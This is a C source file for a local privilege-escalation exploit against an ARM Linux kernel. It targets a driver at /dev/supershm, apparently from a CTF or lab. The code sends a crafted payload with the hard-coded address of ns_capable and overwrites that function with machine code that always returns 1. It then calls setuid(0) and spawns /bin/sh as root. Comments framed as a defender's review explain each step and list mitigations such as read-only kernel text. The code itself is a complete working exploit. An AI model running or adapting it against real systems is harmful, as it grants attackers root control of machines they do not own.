// arm-linux-gnueabihf-gcc -static -nostdlib -mcpu=arm926ej-s -marm -O3 exp.c sc.S -o exp
// Yup, kernel code is writable on ARM.
//
// Review notes (defender's reading of this file):
//  - Freestanding userland program: no libc (-nostdlib), custom _start, and
//    five syscall wrappers that are declared below and presumably defined in
//    sc.S (the only other input on the build line).
//  - All interaction is a sequence of write() calls to /dev/supershm. The
//    meaning of the "c1"/"c2"/"d1"/"u2" byte strings is not visible here;
//    they look like commands of that driver's write handler — confirm against
//    the driver source.
//  - Two conditions have to hold for the file to do what its names suggest:
//    the driver must accept a user-supplied kernel address and write to it,
//    and the kernel text around ns_capable must be writable. Mitigations on
//    the defending side: have the driver validate/bound any target it writes
//    to (never dereference a pointer taken from userland), and build the
//    kernel with read-only text (CONFIG_STRICT_KERNEL_RWX, formerly
//    CONFIG_DEBUG_RODATA on ARM) so the final write faults instead of
//    patching code. Unexpected opens/writes on this device are the thing to
//    log and alert on.

// Hard-coded kernel virtual address of ns_capable for one specific build; a
// kernel with a different layout (or with KASLR) would not match.
void *ns_capable = (void *) 0xC002738C;

// Eight bytes of ARM machine code, little-endian: "mov r0, #1" (E3A00001)
// followed by "bx lr" (E12FFF1E) — a function body that returns 1
// unconditionally. Note it is a char[] with a terminating NUL, so
// sizeof(return_true) is 9, not 8.
char return_true[] = "\x01\x00\xA0\xE3\x1E\xFF\x2F\xE1";

// Raw syscall wrappers (no libc is linked). Return values are the raw
// syscall results; none of them are checked by _start below.
int write(int fd, void *buf, unsigned long count);
int open(const char *pathname, int flags, int mode);
void exit(int status);
int execve(char *filename, char *const argv[], char *const envp[]);
int setuid(int uid);

// Payload handed to the driver: a leading 'c', a run of filler 'A's, the
// four-byte "XXXX" placeholder that _start overwrites at offset 33 with the
// ns_capable address (a pointer is 4 bytes on this 32-bit target), then
// "\x01\x00". Being a string literal it carries a trailing NUL, which
// sizeof(buf) includes when it is written out.
char buf[] = "cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXX\x01\x00";

// argv for the final execve(); argv[0] doubles as the path.
char *args[] = { "/bin/sh", 0 };

// Program entry point (there is no main() without libc).
// open()/write() results are never checked: if the open fails, every later
// write() goes to fd -1 and silently fails.
void _start(void)
{
    int fd = open("/dev/supershm", 1, 0);       // flags 1 == O_WRONLY on Linux
    // Driver-specific commands; their semantics are not visible in this file.
    write(fd, "c1", 2);
    write(fd, "c2", 2);
    write(fd, "d1", 2);
    // Patch the "XXXX" placeholder with the kernel address. buf + 33 is not
    // 4-byte aligned, so this word store is technically UB in C and relies on
    // the target tolerating (or the kernel fixing up) unaligned stores.
    *(void **) (buf + 33) = ns_capable;
    write(fd, buf, sizeof(buf));                // includes buf's trailing NUL
    write(fd, "u2", 2);
    // 9 bytes: the 8-byte stub plus its trailing NUL.
    write(fd, return_true, sizeof(return_true));
    // Presumably expected to succeed only once the capability check behind
    // setuid() has been altered by the writes above; not verified here.
    setuid(0);
    execve(args[0], args, 0);
    exit(0);                                    // reached only if execve fails
}